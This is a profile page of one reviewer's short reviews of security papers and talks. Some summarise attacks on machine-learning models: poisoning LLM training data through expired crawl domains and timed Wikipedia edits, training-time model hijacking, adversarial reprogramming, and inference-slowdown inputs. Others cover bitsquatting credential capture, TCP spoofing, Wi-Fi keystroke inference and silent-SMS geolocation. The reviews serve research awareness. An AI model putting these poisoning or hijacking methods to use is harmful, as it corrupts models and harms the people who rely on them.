Reviews and Comments

Jacob T.

jacob@knowledgehub.social

Joined 1 year, 7 months ago

This link opens in a pop-up window

Did you know that if you change a single bit from 1 to 0 (or …

I loved that they put in the work and it paid off!

5 stars

While there are some more crazy theoretical works out there, this talk showed how they did the work and it paid off on something not theoretically new. Basically they built a bit-squatting system that would handle DNS, SSL reg, and HTTP/IMAP/SMTP for a domain 1-bit off of the target (e.g., coogle.com instead of google.com). This technique has been around for years, but it's been very crufty, and mostly just done to do a talk. These folks spent a lot of time investing into the tooling, and they showed how quickly it paid off, 1000s of OAuth creds for F500 companies, 15k emails with scanned documents, etc.

They assumed that they'd see more hits during the solar storm, but didn't see anything, which they found correlated with a paper that seems to saw that cosmic rays are not the cause of in-memory bit-flips. They also spend a bit of time discussing …

Discussion of AI and its applications to security seems unavoidable nowadays, and, alas, this keynote …

A nice summary of the space

4 stars

As someone who sees a lot of LLM & security research, this keynote is a nice summary of where LLMs will likely (or have already) add value, and where they will never help, regardless of LLM ability.

In short, using LLMs to generate inputs is orders of magnitude too slow to outpace the shear speed of random/semi-random mutation. Using LLMs to generate fuzzing harnesses, and to build generator logic that generates inputs will pay off, LLMs can ingest specs, code, and revise their output to get around coverage blocks.

TCP spoofing—the attack to establish an IP-spoofed TCP connection by bruteforcing a 32-bit server-chosen initial …

Eye opening *and* clever

4 stars

Going into this read, I figured that IP spoofing was of niche availability and applicability, especially in our TLS-dominated world. However, federated services such as SMTP, or database replication commonly use IP addresses for validation.

There are two core new discoveries here, a TCP stack weakness that results in dramatically smaller search spaces to brute-force the correct ISN to continue a TCP session (as few as four guesses!), and a few techniques for determining the ISN outright. Of these, the application-specific ones are cute and reliable. SMTP is the easiest to explain, but if you host your own DNS server for an attacker-controlled domain name, you can spoof a handshake that includes a "HELO .attacker.com". Once you get a hit on that DNS server, you have the correct ISN and can continue the session. Coupled with SPF records which specify which IPs/domains can send email on behalf of a domain, …

Deep learning models are often trained on distributed, web-scale datasets crawled from the internet. In …

Empirical evidence of LLM attacker economics

5 stars

With the race to collect and train on ever more data (and re-train on the latest data more quickly), the ability for LLM creators to perform even cursory checks against training set corruption is almost nil. This paper shows two ways an attacker can corrupt 0.01-1% of a LLM training dataset for a reasonable sum. Existing works have shown that for a specific desired error state, a 0.01% training data poisoning attack can yield a 60-90% chance of tampering with model performance.

There are two core primitives presented in this paper: 1. The corpi release a metadata archive of URLs, and then the fetched content. There are enough expired domains in the metadata that allows for an attacker to corrupt a percentage of the URLs being scraped. 2. Wikipedia is converted into a timestamped dump (e.g., a ZIM file) in a predictable order, and on a predictable schedule. By changing …

The high energy costs of neural network training and inference led to the use of …

A devious optimization goal

5 stars

This paper explores input to DNN models that cause an asymptotic increase in power usage or timing. By using genetic algorithms in a white-box setting, the researchers could find image and text inputs that would drive up inference effort.

The results were impressive, causing a 6000x slowdown on a hosted Azure translation model.

The contact-free sensing nature of Wi-Fi has been leveraged to achieve privacy breaches, yet existing …

Pretty amazing accuracy for a eaves-droppable side-channel

5 stars

This paper explores recovering victim key-presses through a Wi-Fi data channel know as Beam-forming Feedback Information. BFI is used to help wireless APs adjust their beam-forming TX to improve performance, but BFI contains data correlated by changes in device orientation, and the attenuation from nearby movement (e.g., fingers on keyboard). By training a NN, the researchers were able to recover numeric key-presses (from a numeric keyboard) with ~88% accuracy across a variety of devices.

Pretty impressive, and shows how difficult it is to account for side-channels across all the layers of the stack when it's relatively easy to train a very sensitive ML model to extract a tiny signal from the noise.

Sparks (2023, Oxford University Press, Incorporated) 5 stars

Powerful

5 stars

A frank look into the long-term, and ongoing rewriting of history by the CCP, as well as the brave few who manage to continue to document and catalog the past as a time capsule for future generations.

Amazing how one of the largest man-made mass deaths is little known, and almost never studied in Western history. This book opens more questions than it answers, but helpfully comes with a guide for where to go next to learn more.

Not particularly cheery, but there is a glimmer of hope that shines throughout.

HECO: Fully Homomorphic Encryption Compiler (2023, Arxiv) 4 stars

In recent years, Fully Homomorphic Encryption (FHE) has undergone several breakthroughs and advancements, leading to …

An improvement in usability

4 stars

This paper covers a compiler for more traditional imperative code to be converted to optimized (and batched) FHE operations via the SEAL library. The frontend is Python, which is then converted to multiple simplification and optimization passes in the CPP MLIR.

Both synthetic/toy examples and more real-world applications are created in pure imperative implementations (that require non-performant emulation steps), compiled with HECO, and built with FHE optimizations manually. The HECO performance is close to the hand-optimized in most scenarios, even edging it out in a few.

Hopefully the spread of this tool will help FHE reach the masses.

Machine learning has progressed significantly in various applications ranging from face recognition to text generation. …

Less plausible than Adversarial Reprogramming

3 stars

This paper covers a highly-effective (85%+) hijack attack where training data is tainted by an adversary, and then the model can be cajoled into performing other types of tasks. While this work is a steep closer to a more general-type of attack, the model is less plausible than inference-time attacks popularized in the Adversarial Reprogramming literature.

Deep neural networks are susceptible to \emph{adversarial} attacks. In computer vision, well-crafted perturbations to images …

The first "RCE" against ML that I came across

5 stars

I have sent this paper to a number of people over the years from when it first came out, I am surprised there is less attention to this type of attack, despite being a white-box model. This is the first class of attack that lets the attacker reprogram an image classification model to perform an attacker-determined task (e.g., turning an image classifier into a counter task).

Reviewing this paper 5 years after its release, it still stands up, and I see there is a small field of work in this lineage that includes similar attacks against NLP classifiers. I would count this paper as the starting point for this class of attack, which is an impressive and high-impact field.

Short Message Service (SMS) remains one of the most popular communication channels since its introduction …

An improvement over the state-of-the-art with real-world consequences

3 stars

While silent SMSes have been used by authorities for quite some time to geolocate cell-phones, this work puts a less powerful capability into the hands of anyone. By training a ML model on the RTT from sending a silent SMS to phones in different [known] locations, a temporal map of the GSM network can be made to later classify RTTs when targeting a victim phone and approximate their location to country/region.

Without cooperation of the cell infrastructure it's pretty coarse-grained, but still a scary way to figure out where a target of interest is without alerting them.